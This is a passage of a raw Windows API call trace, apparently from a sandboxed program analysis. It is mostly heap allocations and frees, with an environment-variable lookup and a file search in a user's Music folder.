(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0252.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0252.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.524] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0252.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0252.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x2420888 [0252.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0252.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0252.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0252.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0252.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0252.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0252.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0252.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0252.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.527] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0252.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0252.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.527] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0252.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.528] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.528] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0252.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0252.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0252.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0252.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0252.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0252.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0252.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0252.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0252.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.529] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0252.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0252.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0252.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0252.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0252.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0252.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0252.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0252.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0252.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0252.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.532] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0252.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0252.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0252.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0252.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.533] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0252.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0252.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0252.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0252.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.534] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qjSu2Nf.wav", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4826d0, ftCreationTime.dwHighDateTime=0x1d4ce8a, ftLastAccessTime.dwLowDateTime=0x8ab44d10, ftLastAccessTime.dwHighDateTime=0x1d4c612, ftLastWriteTime.dwLowDateTime=0x8ab44d10, ftLastWriteTime.dwHighDateTime=0x1d4c612, nFileSizeHigh=0x0, nFileSizeLow=0xafeb, dwReserved0=0xec0530, dwReserved1=0xd0d9, cFileName="qjSu2Nf.wav", cAlternateFileName="")) returned 0xaa5920 [0252.534] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0252.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.535] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0252.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0252.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0252.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 